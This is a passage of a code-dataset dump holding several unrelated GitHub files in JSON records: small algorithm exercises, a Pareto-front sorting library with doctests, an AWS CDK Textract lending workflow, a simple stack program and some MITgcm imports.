main()\n","repo_name":"testkevinkim/py_stock_research","sub_path":"research/us/forecast_eps/backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"72929451146","text":"\"\"\"\n재귀 이용한 방법\n\"\"\"\nfrom sys import stdin\nfrom typing import List\n\n\ndef show(arr: List[str], start: int) -> None:\n if not arr:\n return\n\n _min = min(arr)\n idx = arr.index(_min)\n res[start + idx] = _min\n print(''.join(res))\n\n show(arr[idx + 1:], start + idx + 1)\n show(arr[:idx], start)\n\n\nif __name__ == \"__main__\":\n x = list(stdin.readline().rstrip())\n\n res = [''] * len(x)\n show(x, 0)","repo_name":"boorooksus/Algorithm-Study","sub_path":"백준/CH09_Implementation/G5-16719-ZOAC2.py","file_name":"G5-16719-ZOAC2.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20584484653","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n'''\n4. 
假设有一个数组,只有一个数出现一次,其他数都出现两次,求出现一次的数。\n'''\n\n#利用异或操作,a^a=0,0^a=a,将数组所有的数进行异或,即可得到只出现一次的数\ndef func(nums):\n result = 0\n for i in nums:\n result ^= i\n return result\n\nprint(func([1, 2, 2, 10, 1, 4, 5, 4, 5]))","repo_name":"WuGavin/Code","sub_path":"20181208/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6931427487","text":"from typing import List\nfrom enum import Enum, auto\nimport abc\nfrom collections import defaultdict, Counter\n\nclass MaxMin(Enum):\n MAX = 1\n MIN = 2\n SKIP = 3\n\n def __repr__(self) -> str:\n return self.name\n\nclass MaxMinList:\n def __init__(self, *target_list: List[MaxMin], none_is_good=False):\n \"\"\"\n >>> MaxMinList(MaxMin.MAX, MaxMin.MIN)\n MaxMinList[MAX ,MIN]\n \"\"\"\n self._target_list = target_list\n self._dim = len(target_list)\n self._none_is_good = none_is_good\n\n def __repr__(self) -> str:\n return \"MaxMinList[{}]\".format(\" ,\".join([i.__repr__() for i in self._target_list]))\n \n @property\n def dim(self) -> int: return self._dim\n\n @property\n def list(self) -> List[MaxMin]:\n return self._target_list\n \n @property\n def none_is_good(self):\n return self._none_is_good\n\nclass Domination(Enum):\n GREATER = 1\n EQUAL = 0\n LESS = -1\n \n def __repr__(self) -> str:\n return self.name\n\n\ndef by_none(a, b) -> Domination:\n \"\"\"\n >>> by_none(None, 1)\n GREATER\n >>> by_none(1, None)\n LESS\n >>> by_none(None, None)\n EQUAL\n >>> by_none(1, 1)\n EQUAL\n \n \"\"\"\n if a is None and b is not None:\n return Domination.GREATER\n if b is None and a is not None:\n return Domination.LESS\n return Domination.EQUAL\n\ndef by_value(a, b) -> Domination:\n \"\"\"\n >>> by_value(2, 1)\n GREATER\n >>> by_value(1, 2)\n LESS\n >>> by_value(2, 2)\n EQUAL\n >>> by_value(1, 1)\n EQUAL\n \n \"\"\"\n if a > b:\n return Domination.GREATER\n if a < b:\n return Domination.LESS\n return Domination.EQUAL\n\ndef cmp_to_target(a, b, cmp, target: MaxMin, none_is_good) -> Domination:\n \"\"\"\n >>> cmp_to_target(2, 1, by_value, MaxMin.MAX, False)\n GREATER\n >>> cmp_to_target(1, 2, by_value, MaxMin.MAX, False)\n LESS\n >>> cmp_to_target(2, 2, by_value, MaxMin.MAX, False)\n EQUAL\n >>> cmp_to_target(1, 1, by_value, MaxMin.MAX, False)\n EQUAL\n >>> cmp_to_target(2, 1, by_value, MaxMin.MIN, False)\n LESS\n >>> cmp_to_target(1, 2, by_value, MaxMin.MIN, False)\n GREATER\n >>> cmp_to_target(2, 2, by_value, MaxMin.MIN, False)\n EQUAL\n >>> cmp_to_target(1, 2, by_value, MaxMin.SKIP, False)\n EQUAL\n >>> cmp_to_target(None, 1, by_value, MaxMin.MIN, False)\n LESS\n >>> cmp_to_target(1, None, by_value, MaxMin.MIN, False)\n GREATER\n >>> cmp_to_target(None, None, by_value, MaxMin.MIN, False)\n EQUAL\n >>> cmp_to_target(None, 1, by_none, MaxMin.MAX, False)\n LESS\n >>> cmp_to_target(1, None, by_none, MaxMin.MAX, False)\n GREATER\n >>> cmp_to_target(None, None, by_none, MaxMin.MAX, False)\n EQUAL\n\n \"\"\"\n if target is MaxMin.SKIP:\n return Domination.EQUAL\n if a is None and b is not None:\n return Domination.LESS if not none_is_good else Domination.GREATER\n if a is not None and b is None:\n return Domination.GREATER if not none_is_good else Domination.LESS\n \n if a is None and b is None:\n return Domination.EQUAL\n\n cmp_result = cmp(a ,b)\n if target is MaxMin.MAX:\n return cmp_result\n else:\n if cmp_result is Domination.LESS:\n return Domination.GREATER\n elif cmp_result is Domination.GREATER:\n return Domination.LESS\n else:\n return 
Domination.EQUAL\n\ndef dominates(a: list, b: list, cmp, targets: MaxMinList) -> Domination:\n \"\"\"\n >>> a = [None]\n >>> b = [1]\n >>> target = MaxMinList(MaxMin.MIN)\n >>> dominates(a, a, by_none, target)\n EQUAL\n >>> dominates(a, b, by_none, target)\n LESS\n >>> dominates(b, a, by_none, target)\n GREATER\n >>> dominates(b, b, by_none, target)\n EQUAL\n >>> a = [1, None]\n >>> b = [1, 1]\n >>> target = MaxMinList(MaxMin.MIN, MaxMin.MIN)\n >>> dominates(a, a, by_none, target)\n EQUAL\n >>> dominates(a, b, by_none, target)\n LESS\n >>> dominates(b, a, by_none, target)\n GREATER\n >>> dominates(b, b, by_none, target)\n EQUAL\n >>> dominates([1, None], [None, 1], by_none, target)\n EQUAL\n >>> a = [2, 1]\n >>> b = [2, 2]\n >>> target = MaxMinList(MaxMin.MAX, MaxMin.MAX)\n >>> dominates(a, a, by_value, target)\n EQUAL\n >>> dominates(a, b, by_value, target)\n LESS\n >>> dominates(b, a, by_value, target)\n GREATER\n >>> dominates(b, b, by_value, target)\n EQUAL\n >>> dominates([1, 0], [0, 1], by_value, target)\n EQUAL\n >>> dominates((None, 0, 1), (0, 0, 0), by_value, MaxMinList(MaxMin.MAX, MaxMin.MAX, MaxMin.MAX, none_is_good=False))\n EQUAL\n \n\n \"\"\"\n results = list()\n for d in range(targets.dim):\n results.append(cmp_to_target(a[d], b[d], cmp, targets.list[d], targets.none_is_good))\n \n is_greater_in_any = False\n for r in results:\n if r is Domination.GREATER:\n is_greater_in_any = True\n break\n\n is_less_in_any = False\n for r in results:\n if r is Domination.LESS:\n is_less_in_any = True\n break\n\n if is_greater_in_any and not is_less_in_any:\n return Domination.GREATER\n if is_less_in_any and not is_greater_in_any:\n return Domination.LESS\n return Domination.EQUAL\n\n\nclass DominanceMatrix:\n \"\"\"\n Dominance matrix used in the fast non dominated search from:\n\n Verma G., Kumar A., Mishra K.K. (2011) A Novel Non-dominated Sorting Algorithm. \n In: Panigrahi B.K., Suganthan P.N., Das S., Satapathy S.C. (eds) Swarm, Evolutionary, and Memetic Computing. \n SEMCCO 2011. Lecture Notes in Computer Science, vol 7076. Springer, Berlin, Heidelberg\n \n\n >>> targets = MaxMinList(MaxMin.MAX, MaxMin.MAX, MaxMin.MAX)\n >>> dominates = Comparison(by_value, targets).compare\n >>> values = [(2,2,2), (0,1,1), (0,0,1), (0,1,0), (1,0,0), (0,0,0)]\n >>> for front in DominanceMatrix(values, dominates).get_pareto_fronts():\n ... print(front)\n [(2, 2, 2)]\n [(0, 1, 1), (1, 0, 0)]\n [(0, 0, 1), (0, 1, 0)]\n [(0, 0, 0)]\n \n \n >>> values = [(1,0,0), (None,1,1), (None,0,1), (0,0,0)]\n >>> for front in DominanceMatrix(values, dominates).get_pareto_fronts():\n ... 
print(front)\n [(1, 0, 0), (None, 1, 1)]\n [(None, 0, 1), (0, 0, 0)]\n\n \"\"\"\n def __init__(self, values, dominates):\n dimension = len(values)\n self.is_dominating = defaultdict(list)\n self.dominated_by_counter = defaultdict(int)\n self.values = list(values)\n\n for i in range(dimension):\n for j in range(i + 1, dimension):\n a = values[i]\n b = values[j]\n rel = dominates(a, b)\n if rel == Domination.GREATER:\n self.is_dominating[a].append(b)\n self.dominated_by_counter[b] += 1\n elif rel == Domination.LESS:\n self.is_dominating[b].append(a)\n self.dominated_by_counter[a] += 1\n\n def get_pareto_fronts(self):\n while self.values:\n current_front = [ v for v in self.values if self.dominated_by_counter[v] == 0]\n yield current_front\n\n for v in current_front:\n for dominated in self.is_dominating[v]:\n self.dominated_by_counter[dominated] -= 1\n\n self.values.remove(v)\n try:\n del self.is_dominating[v]\n except KeyError:\n pass\n try:\n del self.dominated_by_counter[v]\n except KeyError:\n pass\n\n\nclass Cmp(metaclass=abc.ABCMeta):\n @abc.abstractclassmethod\n def compare(self, a, b) -> Domination:\n raise NotImplementedError\n \n @abc.abstractclassmethod\n def is_pareto(self) -> bool:\n raise NotImplementedError\n \n @abc.abstractclassmethod\n def is_group(self) -> bool:\n raise NotImplementedError\n\n @abc.abstractclassmethod\n def group(self, a) -> int:\n raise NotImplementedError\n\nclass GroupNones(Cmp):\n def __init__(self, targets: MaxMinList):\n self._targets = targets\n @property\n def targets(self):\n return self._targets\n def compare(self, a, b) -> Domination:\n raise NotImplementedError\n def is_pareto(self) -> bool:\n return False\n def is_group(self) -> bool:\n return True\n\n def group(self, a) -> int:\n \"\"\"\n GroupNones(MaxMinList(MaxMin.MIN, MaxMin.MIN, MaxMin.MIN)).group((0,None,None))\n -2\n \"\"\"\n noneSum = 0\n for d in range(self.targets.dim):\n if self.targets.list[d] is MaxMin.SKIP:\n continue\n if self.targets.list[d] is MaxMin.MAX and a[d] is None:\n noneSum += 1\n if self.targets.list[d] is MaxMin.MIN and a[d] is None:\n noneSum -= 1\n return noneSum\n \n def and_then(self, c: Cmp) -> Cmp:\n return ComparisonChain(self, c)\n \n def as_chain(self):\n return ComparisonChain(self)\n\n\nclass Comparison(Cmp):\n def __init__(self, cmp, targets: MaxMinList):\n self._cmp = cmp\n self._targets = targets\n \n def is_pareto(self) -> bool: return True\n def is_group(self) -> bool: return False\n def group(self, a) -> int: return 1\n\n @property\n def cmp(self):\n return self._cmp\n\n @property\n def targets(self):\n return self._targets\n\n def compare(self, a,b) -> Domination:\n return dominates(a, b, self.cmp, self.targets)\n\n def and_then(self, c: Cmp) -> Cmp:\n return ComparisonChain(self, c)\n \n def as_chain(self):\n return ComparisonChain(self)\n\nclass ComparisonChain:\n def __init__(self, *chain: List[Comparison]):\n self._chain = chain\n\n @property\n def chain(self) -> List[Comparison]:\n return self._chain\n\n def compare(self, a, b) -> Domination:\n for c in self.chain[:-1]:\n if not c.is_pareto():\n continue\n result = c.compare(a, b)\n if result == Domination.EQUAL:\n continue\n return result\n return self.chain[-1].compare(a, b)\n \n def and_then(self, c: Cmp) -> Cmp:\n return ComparisonChain(self, *self.chain, c)\n\n \n def split_by_pareto(self, values):\n \"\"\"ComparisonChain.split_by_pareto performs the pareto front split fronts.\n\nCurrently this works only for unique rows. 
You can add id as the last row (and not sort by it) to work around this restriction.\n\nHere the None means just inferior value:\n\n >>> values = [(0,None,None), (2,2,2), (0,1,1), (0,0,1), (None,0,1), (0,1,0), (None,1,1), (1,0,0), (0,0,0)]\n >>> chain = Comparison(by_value, MaxMinList(MaxMin.MAX, MaxMin.MAX, MaxMin.MAX)).as_chain()\n >>> chain.split_by_pareto(values)\n [[(2, 2, 2)], [(0, 1, 1), (1, 0, 0)], [(0, 0, 1), (0, 1, 0), (None, 1, 1)], [(None, 0, 1), (0, 0, 0)], [(0, None, None)]]\n\nHere one extra None means that the whole row is inferior:\n\n >>> values = [(0,None,None), (2,2,2), (0,1,1), (0,0,1), (None,0,1), (0,1,0), (None,1,1), (1,0,0), (0,0,0), (None, 0, None)]\n >>> chain = GroupNones(MaxMinList(MaxMin.MIN, MaxMin.MIN, MaxMin.MIN)).and_then(\n ... Comparison(by_value, MaxMinList(MaxMin.MAX, MaxMin.MAX, MaxMin.MAX)))\n >>> chain.split_by_pareto(values)\n [[(2, 2, 2)], [(0, 1, 1), (1, 0, 0)], [(0, 0, 1), (0, 1, 0)], [(0, 0, 0)], [(None, 1, 1)], [(None, 0, 1)], [(0, None, None), (None, 0, None)]]\n\n\"\"\"\n splitted = [values]\n for comparison in self.chain:\n if comparison.is_pareto():\n new_splitted = []\n while len(splitted) > 0:\n group = splitted.pop(0)\n new_groups = list(DominanceMatrix(group, comparison.compare).get_pareto_fronts())\n new_splitted.extend(new_groups)\n splitted = new_splitted\n elif comparison.is_group():\n new_splitted = []\n while len(splitted) > 0:\n group = splitted.pop(0)\n group_dict = defaultdict(list)\n for a in group:\n group_dict[comparison.group(a)].append(a)\n keys = list(group_dict.keys())\n keys.sort()\n keys.reverse()\n new_groups = [group_dict[k] for k in keys]\n \n new_splitted.extend(new_groups)\n splitted = new_splitted\n return splitted\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()","repo_name":"kummahiih/pypareto","sub_path":"pypareto/pypareto.py","file_name":"pypareto.py","file_ext":"py","file_size_in_byte":12611,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"81"} +{"seq_id":"73115560905","text":"from constructs import Construct\nimport os\nimport aws_cdk.aws_s3 as s3\nimport aws_cdk.aws_s3_notifications as s3n\nimport aws_cdk.aws_stepfunctions as sfn\nimport aws_cdk.aws_stepfunctions_tasks as tasks\nimport aws_cdk.aws_dynamodb as dynamodb\nimport aws_cdk.aws_lambda as lambda_\nimport aws_cdk.aws_iam as iam\nimport aws_cdk.custom_resources as custom_resources\nfrom aws_cdk import (CfnOutput, RemovalPolicy, Stack, Duration, CustomResource,\n Aws)\nimport amazon_textract_idp_cdk_constructs as tcdk\n\n\nclass LendingWorkflow(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(\n scope,\n construct_id,\n description=\n \"IDP CDK constructs sample for Textract AnalyzeLending and subsequent CSV generation with extraction path for AnalzyeLending unknown doc-types (SO9217)\",\n **kwargs)\n\n script_location = os.path.dirname(__file__)\n s3_upload_prefix = \"uploads\"\n s3_output_prefix = \"textract-output\"\n s3_temp_output_prefix = \"textract-temp-output\"\n s3_txt_output_prefix = \"textract-txt-output\"\n s3_csv_output_prefix = \"textract-csv-output\"\n\n # BEWARE! 
This is a demo/POC setup, remove the auto_delete_objects=True to maintain objects/document after destorying the stack\n document_bucket = s3.Bucket(self,\n \"TextractSimpleSyncWorkflow\",\n auto_delete_objects=True,\n removal_policy=RemovalPolicy.DESTROY)\n s3_output_bucket = document_bucket.bucket_name\n workflow_name = \"LendingWorkflow\"\n\n #### DOCUMENT TYPE CONFIGURATION SETUP ####\n # Configuration table for Document-Type to Textract features mapping\n configuration_table = dynamodb.Table(\n self,\n 'TextractConfigurationTable',\n partition_key=dynamodb.Attribute(\n name='DOCUMENT_TYPE', type=dynamodb.AttributeType.STRING),\n billing_mode=dynamodb.BillingMode.PAY_PER_REQUEST,\n removal_policy=RemovalPolicy.DESTROY,\n )\n\n configuration_init_function: lambda_.IFunction = lambda_.DockerImageFunction( #type: ignore\n self,\n \"ConfigurationInitFunction\",\n code=lambda_.DockerImageCode.from_image_asset(\n os.path.join(script_location,\n '../lambda/cfn_custom_configurator_prefill')),\n memory_size=128,\n timeout=Duration.seconds(600),\n architecture=lambda_.Architecture.X86_64,\n environment={\n \"LOG_LEVEL\": 'DEBUG',\n \"CONFIGURATION_TABLE\": configuration_table.table_name\n })\n\n configuration_init_function.add_to_role_policy(\n iam.PolicyStatement(\n actions=['dynamodb:PutItem', 'dynamodb:GetItem'],\n resources=[configuration_table.table_arn]))\n\n provider = custom_resources.Provider(\n self,\n 'Provider',\n on_event_handler=configuration_init_function,\n )\n\n CustomResource(self, 'Resource', service_token=provider.service_token)\n\n ### END OF DOCUMENT TYPE CONFIGURATION SETUP ####\n\n decider_task = tcdk.TextractPOCDecider(\n self,\n f\"{workflow_name}-Decider\",\n )\n\n textract_lending_task = tcdk.TextractGenericAsyncSfnTask(\n self,\n \"TextractAnalzyeLending\",\n s3_output_bucket=s3_output_bucket,\n s3_temp_output_prefix=s3_temp_output_prefix,\n textract_api=\"LENDING\",\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n lambda_log_level=\"DEBUG\",\n timeout=Duration.hours(24),\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.textract_result\")\n\n textract_lending_to_json = tcdk.TextractAsyncToJSON(\n self,\n \"GenerateLendingJSON\",\n s3_output_prefix=s3_output_prefix,\n s3_output_bucket=s3_output_bucket,\n textract_api='LENDING')\n\n generate_lending_csv = tcdk.TextractGenerateCSV(\n self,\n \"GenerateLendingCSV\",\n csv_s3_output_bucket=document_bucket.bucket_name,\n csv_s3_output_prefix=s3_csv_output_prefix,\n output_type='CSV',\n textract_api='LENDING',\n meta_data_to_append=[\"DOCUMENT_ID\"],\n lambda_log_level=\"DEBUG\",\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.txt_output_location\")\n\n textract_sync_task = tcdk.TextractGenericSyncSfnTask(\n self,\n \"TextractSyncOCR\",\n s3_output_bucket=s3_output_bucket,\n s3_output_prefix=s3_output_prefix,\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n lambda_log_level=\"DEBUG\",\n timeout=Duration.hours(24),\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n 
result_path=\"$.textract_result\")\n\n generate_text = tcdk.TextractGenerateCSV(\n self,\n \"GenerateText\",\n csv_s3_output_bucket=document_bucket.bucket_name,\n csv_s3_output_prefix=s3_txt_output_prefix,\n output_type='LINES',\n lambda_log_level=\"DEBUG\",\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.txt_output_location\")\n\n classification_custom_docker: lambda_.IFunction = lambda_.DockerImageFunction( #type: ignore\n self,\n \"ClassificationCustomDocker\",\n code=lambda_.DockerImageCode.from_image_asset(\n os.path.join(script_location,\n '../lambda/lending_sample_classification/')),\n memory_size=10240,\n architecture=lambda_.Architecture.X86_64,\n timeout=Duration.seconds(900),\n environment={\"LOG_LEVEL\": \"DEBUG\"})\n\n spacy_classification_task = tcdk.SpacySfnTask(\n self,\n \"Classification\",\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n docker_image_function=classification_custom_docker,\n lambda_log_level=\"DEBUG\",\n timeout=Duration.hours(24),\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.classification\")\n\n configurator_task = tcdk.TextractClassificationConfigurator(\n self,\n f\"{workflow_name}-Configurator\",\n configuration_table=configuration_table)\n\n textract_queries_async_task = tcdk.TextractGenericAsyncSfnTask(\n self,\n \"TextractAsyncQueries\",\n s3_output_bucket=s3_output_bucket,\n s3_temp_output_prefix=s3_output_prefix,\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n lambda_log_level=\"DEBUG\",\n timeout=Duration.hours(24),\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.textract_result\")\n\n textract_async_to_json = tcdk.TextractAsyncToJSON(\n self,\n \"TextractAsyncToJSON2\",\n s3_output_prefix=s3_output_prefix,\n s3_output_bucket=s3_output_bucket)\n\n generate_csv = tcdk.TextractGenerateCSV(\n self,\n \"GenerateCsvTask\",\n csv_s3_output_bucket=document_bucket.bucket_name,\n csv_s3_output_prefix=s3_csv_output_prefix,\n lambda_log_level=\"DEBUG\",\n output_type='CSV',\n meta_data_to_append=[\"DOCUMENT_ID\"],\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.csv_output_location\",\n )\n\n unclassified_lambda_sfn: lambda_.IFunction = lambda_.DockerImageFunction( #type: ignore\n self,\n 'LendingUnclassifiedNumber',\n code=lambda_.DockerImageCode.from_image_asset(\n os.path.join(script_location,\n '../lambda/lending-unclassified')),\n memory_size=128,\n architecture=lambda_.Architecture.X86_64,\n environment={\"LOG_LEVEL\": \"DEBUG\"})\n\n unclassified_lambda_sfn.add_to_role_policy(\n iam.PolicyStatement(actions=['s3:List*'],\n resources=[\n f\"arn:aws:s3:::{s3_output_bucket}\",\n f\"arn:aws:s3:::{s3_output_bucket}/*\"\n ]))\n\n unclassified_lambda_task = tasks.LambdaInvoke(\n self,\n 'UnclassifiedNumberTask',\n 
lambda_function=unclassified_lambda_sfn,\n output_path='$.Payload')\n\n # The set_meta_data_function sets the document_id, so the process can later add that to the CSV output\n set_meta_data_function: lambda_.IFunction = lambda_.DockerImageFunction( #type: ignore\n self,\n 'SetMetaDataFunction',\n code=lambda_.DockerImageCode.from_image_asset(\n os.path.join(script_location,\n '../lambda/set-manifest-meta-data')),\n memory_size=128,\n architecture=lambda_.Architecture.X86_64,\n environment={\"LOG_LEVEL\": \"ERROR\"})\n\n set_meta_data_task = tasks.LambdaInvoke(\n self,\n 'SetMetaData',\n lambda_function=set_meta_data_function,\n output_path='$.Payload')\n\n lambda_generate_classification_mapping: lambda_.IFunction = lambda_.DockerImageFunction( #type: ignore\n self,\n \"LambdaGenerateClassificationMapping\",\n code=lambda_.DockerImageCode.from_image_asset(\n os.path.join(script_location,\n '../lambda/map_classifications_lambda/')),\n memory_size=128,\n architecture=lambda_.Architecture.X86_64,\n environment={})\n\n task_generate_classification_mapping = tasks.LambdaInvoke(\n self,\n \"TaskGenerateClassificationMapping\",\n lambda_function=lambda_generate_classification_mapping,\n output_path='$.Payload')\n\n analyze_lending_post_processing_chain = textract_lending_to_json.next(\n generate_lending_csv)\n\n doc_type_choice = sfn.Choice(self, 'RouteDocType') \\\n .when(sfn.Condition.string_equals('$.classification.documentType', 'NONE'), task_generate_classification_mapping) \\\n .when(sfn.Condition.string_equals('$.classification.documentType', 'CONTACT_FORM'), configurator_task)\\\n .when(sfn.Condition.string_equals('$.classification.documentType', 'HOMEOWNERS_INSURANCE_APPLICATION'), configurator_task)\\\n .otherwise(task_generate_classification_mapping)\n\n configurator_task.next(textract_queries_async_task) \\\n .next(textract_async_to_json) \\\n .next(generate_csv) \\\n .next(task_generate_classification_mapping)\n\n textract_sync_task.next(generate_text) \\\n .next(spacy_classification_task) \\\n .next(doc_type_choice)\n\n map = sfn.Map(\n self,\n \"Unclassified Documents Map State\",\n items_path=sfn.JsonPath.string_at('$.unclassifiedDocsArray'),\n parameters={\n \"manifest\": {\n \"s3Path\":\n sfn.JsonPath.string_at(\"States.Format('s3://{}/{}/{}', \\\n $.unclassifiedDocsBucket, \\\n $.unclassifiedDocsPrefix, \\\n $$.Map.Item.Value)\"),\n \"metaData\":\n sfn.JsonPath.string_at('$.manifest.metaData')\n },\n \"mime\": sfn.JsonPath.string_at('$.mime'),\n \"numberOfPages\": 1\n })\n map.iterator(textract_sync_task)\n\n unclassified_chain = sfn.Chain.start(unclassified_lambda_task) \\\n .next(map)\n\n # unclassified_state_machine = sfn.StateMachine(\n # self, \"UnclassifiedStateMachine\", definition=unclassified_chain)\n\n # unclassified_task = tasks.StepFunctionsStartExecution(\n # self,\n # \"UnclassifiedProcessing\",\n # state_machine=unclassified_state_machine,\n # integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n # input=sfn.TaskInput.from_object({\n # \"Token\":\n # sfn.JsonPath.task_token,\n # \"ExecutionId\":\n # sfn.JsonPath.string_at('$$.Execution.Id'),\n # \"Payload\":\n # sfn.JsonPath.entire_payload,\n # }))\n\n parallel_tasks = sfn.Parallel(self, 'parallel') \\\n .branch(analyze_lending_post_processing_chain) \\\n .branch(unclassified_chain)\n\n workflow_chain = sfn.Chain \\\n .start(set_meta_data_task) \\\n .next(decider_task) \\\n .next(textract_lending_task) \\\n .next(parallel_tasks)\n\n # GENERIC\n state_machine = sfn.StateMachine(self,\n workflow_name,\n 
definition=workflow_chain)\n\n lambda_step_start_step_function = lambda_.DockerImageFunction(\n self,\n \"LambdaStartStepFunctionGeneric\",\n code=lambda_.DockerImageCode.from_image_asset(\n os.path.join(script_location, '../lambda/startstepfunction')),\n memory_size=128,\n architecture=lambda_.Architecture.X86_64,\n environment={\"STATE_MACHINE_ARN\": state_machine.state_machine_arn})\n\n lambda_step_start_step_function.add_to_role_policy(\n iam.PolicyStatement(actions=['states:StartExecution'],\n resources=[state_machine.state_machine_arn]))\n\n document_bucket.add_event_notification(\n s3.EventType.OBJECT_CREATED,\n s3n.LambdaDestination(\n lambda_step_start_step_function), #type: ignore\n s3.NotificationKeyFilter(prefix=s3_upload_prefix))\n\n # OUTPUT\n CfnOutput(\n self,\n \"DocumentUploadLocation\",\n value=f\"s3://{document_bucket.bucket_name}/{s3_upload_prefix}/\",\n export_name=f\"{Aws.STACK_NAME}-DocumentUploadLocation\")\n CfnOutput(\n self,\n \"StartStepFunctionLambdaLogGroup\",\n value=lambda_step_start_step_function.log_group.log_group_name)\n current_region = Stack.of(self).region\n CfnOutput(\n self,\n 'StepFunctionFlowLink',\n value=\n f\"https://{current_region}.console.aws.amazon.com/states/home?region={current_region}#/statemachines/view/{state_machine.state_machine_arn}\",\n export_name=f\"{Aws.STACK_NAME}-StepFunctionFlowLink\")\n","repo_name":"aws-solutions-library-samples/guidance-for-low-code-intelligent-document-processing-on-aws","sub_path":"textract_cdk_stack_samples/lending_workflow.py","file_name":"lending_workflow.py","file_ext":"py","file_size_in_byte":16820,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"81"} +{"seq_id":"17827576366","text":"#! python3\n# Stack overview program. 
with built-in method\nimport sys\n\nlst = []\n\ndef push(number):\n\tif len(lst) <= 10:\n\t\tlst.append(number)\n\telse:\t\n\t\tprint(\"Stack overload\")\n\t\t\n\ndef pops():\n\tremove_element = 0\n\tif len(lst) > 0:\n\t\tremove_element = lst[len(lst) - 1]\n\t\tlst.pop()\n\t\tprint(\"The list element value is \", remove_element, \" has been removed.\")\n\telse:\n\t\tprint(\"The list is empty.\")\n\t\ndef is_empty():\n\tif len(lst) == 0:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef length():\n\treturn len(lst)\n\ndef top():\n\treturn lst[0]\n\ndef show():\n\tprint(lst)\n\ndef title():\n\tprint(\"Stack operation\")\n\ndef body():\n\tprint(\"0 => quit\")\n\tprint(\"1 => push\")\n\tprint(\"2 => pop\")\n\tprint(\"3 => len\")\n\tprint(\"4 => is_empty\")\n\tprint(\"5 => top\")\n\tprint(\"6 => show\")\n\nif __name__ == '__main__':\n\topt = 6\n\ttitle()\n\twhile opt != 0:\n\t\ttry:\n\t\t\tbody()\n\t\t\topt = int(input(\"Enter option: \"))\n\t\t\tprint(\"Ok, your request is processing.\")\n\t\t\tif opt == 0:\n\t\t\t\tprint(\"Bye bye, thanks for trying.\")\n\t\t\t\tsys.exit()\n\t\t\telif opt == 1:\n\t\t\t\tprint(\"Push value in stack\")\n\t\t\t\ttry:\n\t\t\t\t\tvalue = int(input(\"Enter value in stack \"))\n\t\t\t\t\tpush(value)\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"There was just an issue, when push value in stack.\")\n\t\t\telif opt == 2:\n\t\t\t\tprint(\"Pop value in stack\")\n\t\t\t\tpops()\n\t\t\telif opt == 3:\n\t\t\t\tprint(\"The length of stack is \", length())\n\t\t\telif opt == 4:\n\t\t\t\tif is_empty():\n\t\t\t\t\tprint(\"Yes, the stack is emtpy.\")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"No, the stack is not empty.\")\n\t\t\telif opt == 5:\n\t\t\t\tprint(\"The top stack reference is\", top())\n\t\t\telif opt == 6:\n\t\t\t\tshow()\n\t\t\telse:\n\t\t\t\tprint(\"Incorrect input.\")\n\t\texcept:\n\t\t\tpass\n\n\t","repo_name":"kshitijyadav1/Python_Programming_Stuff","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6937358935","text":"import MITgcmDiff.loadFunctions\nimport MITgcmDiff.Operators as op \nimport MITgcmDiff.utils as ut\nfrom MITgcmutils import mds\nimport MITgcmDiff.loadFunctions as lf\nimport MITgcmDiff.xarrayCoversion as xac\nimport numpy as np\nimport pandas as pd\n\n\nclass 